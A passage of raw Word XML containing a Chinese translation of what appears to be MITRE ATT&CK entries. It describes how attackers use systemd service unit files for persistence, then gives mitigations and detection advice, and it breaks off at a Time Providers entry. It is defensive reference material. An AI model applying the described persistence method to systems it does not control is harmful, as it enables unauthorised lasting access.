        </w:rPr>
        <w:t>目录中，并且具有文件扩展名</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2A7A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>.service</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2A7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。每个服务单元文件可能包含许多指令，这些指令可以执行系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D887EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:t>ExecStart, ExecStartPre,</w:t>
      </w:r>
      <w:r w:rsidRPr="00883BA8">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ExecStartPost</w:t>
      </w:r>
      <w:r w:rsidRPr="00883BA8">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指令涵盖当服务，通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00883BA8">
        <w:t>"systemctl"</w:t>
      </w:r>
      <w:r w:rsidRPr="00883BA8">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手动启动时的命令执行，或者如果服务设置为自动启动，则在系统启动时执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E39CB7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:t>ExecReload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>指令涵盖服务何时重新启动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FFD780" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:t>ExecStop</w:t>
      </w:r>
      <w:r w:rsidRPr="009305B1">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ExecStopPost</w:t>
      </w:r>
      <w:r w:rsidRPr="009305B1">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>涵盖服务通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009305B1">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009305B1">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="009305B1">
        <w:t>ctl"</w:t>
      </w:r>
      <w:r w:rsidRPr="009305B1">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>停止或手动停止时。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FAF3C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者使用系统化功能，通过创建、和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或修改服务单元文件来建立对受害者系统的持久访问，这些文件会导致系统定期执行恶意命令，例如系统启动时。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E665B67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>虽然对手通常需要根权限才能在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/etc/systemd/system</w:t>
      </w:r>
      <w:r w:rsidRPr="009305B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/usr/lib/systemd/system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>目录中创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>修改服务单元文件，但低权限用户可以在目录，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.config/systemd/user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以实现用户级持久性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD56E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8BEFFB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3252"/>
        <w:gridCol w:w="6484"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="1F6CC5F1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3252" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="128220AA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6484" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="252BE13E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="007D1D88" w14:paraId="67EAA034" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3252" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF26DCB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007D1D88" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId86" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="007D1D88">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>限制软件安装</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="316AC3E9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007D1D88" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007D1D88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>仅将软件安装限制为受信任的存储库，并小心孤立的软件包</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="007D1D88" w14:paraId="6E36E1CB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3252" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F10CD93" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007D1D88" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId87" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="007D1D88">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账户管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32AB3C59" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007D1D88" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007D1D88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统化服务单元文件的创建和修改的</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通常保留给管理员，如</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:t xml:space="preserve"> Linux </w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:lastRenderedPageBreak/>
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户和其他具有超级用户权限的用户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="007D1D88" w14:paraId="519E00D4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3252" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A81232E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007D1D88" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId88" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="007D1D88">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>限制文件和目录权限</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="572F6E0E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007D1D88" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007D1D88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制对系统单元文件的读</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>写访问，仅选择具有管理系统服务的合法需求的特权用户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="007D1D88" w14:paraId="7FAAE0E8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3252" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35929484" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007D1D88" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId89" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="007D1D88">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户帐户管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53585B14" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007D1D88" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007D1D88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将用户对系统实用程序（如</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:t>"systemctl"</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1D88">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）的访问权限限制为只有具有合法需求的用户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="598331E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E03B9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统服务单元文件可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/etc/systemd/system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/usr/lib/systemd/system/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/home//.config/systemd/user/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>目录内，通过审核文件创建和修改事件检测，以及相关的符号链接。以这种方式生成的可疑进程或脚本将具有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"systemd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的父进程，父进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，并且通常将作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>用户执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F818868" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C13BBE" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>通过将结果与受信任的系统基线进行比较，还可以识别可疑的系统服务。通过使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl </w:t>
      </w:r>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>实用程序检查系统范围的服务，可以检测到恶意的系统化服务：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>systemctl list-units -–type=service –all</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。分析文件系统上存在的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>.service</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件的内容，并确保它们引用合法的、预期的可执行文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175ABA1A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C13BBE" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"systemctl"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>实用程序的执行和命令行参数，以及相关实用程序（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/usr/sbin/service</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）可能会显示恶意的系统服务执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA23364" w14:textId="1BFD196D" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时间</w:t>
      </w:r>
      <w:r w:rsidR="009C4E03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4818D7D0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F9A42CA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1209</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C0139D0" w14:textId="23EFFC74" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3613D946" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32831DCF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B1B5DB2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
